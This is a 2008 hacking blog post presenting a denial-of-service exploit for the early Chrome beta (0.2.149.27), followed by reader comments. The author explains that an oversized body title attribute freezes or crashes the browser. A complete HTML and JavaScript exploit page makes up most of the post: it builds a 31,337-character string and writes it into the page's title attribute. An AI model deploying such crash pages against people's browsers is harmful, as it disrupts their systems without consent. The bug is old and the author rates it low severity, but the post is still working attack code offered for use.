Ready, set, chrome!

Posted on September 8, 2008
Filed Under Exploits, Hacking |

Google’s has lunched their new browser called Chrome in its very early BETA version(0.2.149.27)
and ofcourse everyone is on the race for 0day exploits. So far only few vulnerability has been found most of them are low severity exploits and non of them are a real use for massive 0wnage or somthing
so i thought i’ll give it a try and so far i’ve came up with another kinda useless exploit
i’ve found that Chrome is having a hard time rendering a oversized title attribute causing it to
- freeze under Vista SP1.
- crash in some cases under Windows XP SP1/SP2.

Exploit:

  1. <!
  2.   Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit
  3.   Exploit written by Exodus.
  4.   http://www.blackhat.org.il
  5.   http://www.blackhat.org.il/index.php/ready-set-chrome/
  6.   http://www.blackhat.org.il/exploits/chrome-freeze-exploit.html
  7. >
  8. <HTML>
  9.  <HEAD>
  10.   <TITLE> Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit</TITLE>
  11.    <SCRIPT language="JavaScript">
  12.    function buff(len)
  13.  {
  14.   var buffer;
  15.    for(var i = 0; i != len; i++)
  16.   { buffer += 'E';}
  17.   return buffer;
  18.  }
  19. </SCRIPT>
  20.  </HEAD>
  21.  <SCRIPT>
  22.   document.write('<body title=\”' + buff(31337) + '\”>');
  23.  </SCRIPT>
  24.  </BODY>
  25. </HTML>

Comments

3 Responses to “Ready, set, chrome!”

  1. Google’s Chrome under fire | (-) HatSecurity.com on September 10th, 2008 1:16 pm

    [...] “Tool tip” DoS - September 8, 2008. Exodus of BlackHat Security (Israel) has discovered that a large object title can crash Chrome. This works on the current version of Chrome (0.2.149.29 [...]

  2. spdr on September 13th, 2008 4:11 pm

    Seen http://milw0rm.com/exploits/6367 ?

  3. Exodus on September 13th, 2008 5:32 pm

    yes of course, and i consider it as a low severity too since you gotta save it in order
    for the exploit to work

Leave a Reply